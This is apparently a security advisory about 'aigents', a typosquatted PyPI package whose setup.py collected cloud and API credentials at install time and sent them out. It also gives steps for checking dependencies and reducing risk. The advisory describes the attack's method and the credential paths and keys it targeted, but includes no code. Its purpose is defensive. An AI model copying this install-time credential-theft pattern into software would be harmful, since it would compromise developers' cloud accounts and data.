Malicious PyPI Package 'aigents' Steals Cloud Credentials from AI Developers
Overview
A malicious package named `aigents` was discovered on the Python Package Index (PyPI), targeting AI and machine learning developers through typosquatting. The package mimicked the name of a legitimate but less common AI orchestration tool, tricking developers into installing it. Upon installation via `pip install aigents`, a malicious `setup.py` script was executed. This script scanned the host system for common locations of sensitive files, including `~/.aws/credentials`, `~/.gcp/credentials.json`, and environment variables like `OPENAI_API_KEY` and `HUGGING_FACE_TOKEN`. If found, these credentials were exfiltrated over HTTPS to an attacker-controlled server. The package's author added seemingly legitimate but non-functional boilerplate code related to AI agents to mask its true purpose. The attack was discovered after a developer noticed unexpected network traffic originating from their CI/CD pipeline shortly after adding the dependency. This incident highlights the significant supply chain risk within the rapidly growing AI ecosystem, where developers frequently install numerous open-source packages. The impact is critical, as stolen credentials can be used to compromise cloud infrastructure, access and exfiltrate sensitive data, train malicious models on the victim's GPU resources, and mount further attacks.
Affected Systems
Testing Guide
1. **Review Dependency Tree:** Run `pip list` or `poetry show --tree` in your project's virtual environment to inspect all installed packages, including transitive dependencies. 2. **Check for Suspicious Packages:** Carefully examine the list for packages with names that seem misspelled, have very few downloads on PyPI, or lack a credible source repository. 3. **Audit Installation Scripts:** If you suspect a package, download its source distribution (`.tar.gz`) from PyPI and manually inspect the `setup.py` or `pyproject.toml` files for any obfuscated or suspicious code that runs at installation time (e.g., network requests, file system access).
Mitigation Steps
1. **Verify Package Names:** Before installing any package, double-check its name for typos and verify its authenticity on PyPI by checking its download statistics, release history, and linked GitHub repository. 2. **Use Locked Dependencies:** Use dependency management tools like `Poetry` or `pip-tools` to create a `lock` file (`poetry.lock`, `requirements.txt`) that pins exact, vetted versions of dependencies. 3. **Scan Dependencies:** Integrate automated dependency scanning tools like `pip-audit` or Snyk into your development and CI/CD workflows to detect known malicious or vulnerable packages. 4. **Principle of Least Privilege:** Use short-lived credentials and IAM roles with the minimum necessary permissions for development and deployment, limiting the impact of a potential credential leak.
Patch Details
The malicious package 'aigents' was removed from the PyPI repository by the Python Software Foundation security team on 2025-11-06.